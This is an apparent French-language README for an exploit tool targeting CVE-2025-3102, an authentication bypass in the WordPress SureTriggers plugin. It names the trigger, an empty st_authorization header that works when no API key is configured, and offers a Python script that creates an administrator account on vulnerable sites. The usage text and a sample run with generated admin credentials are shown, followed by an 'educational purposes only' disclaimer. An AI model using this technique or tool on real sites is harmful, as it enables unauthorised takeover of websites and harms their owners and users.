
Wordpress SureTriggers <= 1.0.78 - Contournement d'autorisation dû à un contrôle manquant des valeurs vides permettant la création non authentifiée d'un utilisateur administrateur
🚨 CVE-2025-3102 est une vulnérabilité critique de contournement d'authentification affectant le plugin WordPress SureTriggers: All-in-One Automation Platform, qui est activement installé sur plus de 100 000 sites Web. En raison de la nature de la faille et de l'ampleur du déploiement, cette vulnérabilité présente un risque de sécurité important.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HLe plugin SureTriggers pour WordPress est vulnérable à un contournement d'authentification qui permet à des attaquants non authentifiés de créer des comptes administrateur. Cela est dû à une absence de vérification de valeur vide sur secret_key dans la fonction autheticate_user.
Lorsque le plugin est installé et activé mais non configuré avec une clé API, les attaquants peuvent contourner l'authentification en envoyant un en-tête st_authorization vide, déclenchant ainsi des actions réservées aux utilisateurs authentifiés.
Un script Python est fourni pour automatiser l'exploitation de cette vulnérabilité.
Ce script vous permet de générer un nouvel utilisateur admin sur les sites vulnérables.
readme.txtst_authorization videusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: rHz0d
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
Ce script est fourni uniquement à des fins éducatives.
Toute utilisation non autorisée de ce code contre des cibles sans autorisation explicite est illégale.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés.
Par rHz0d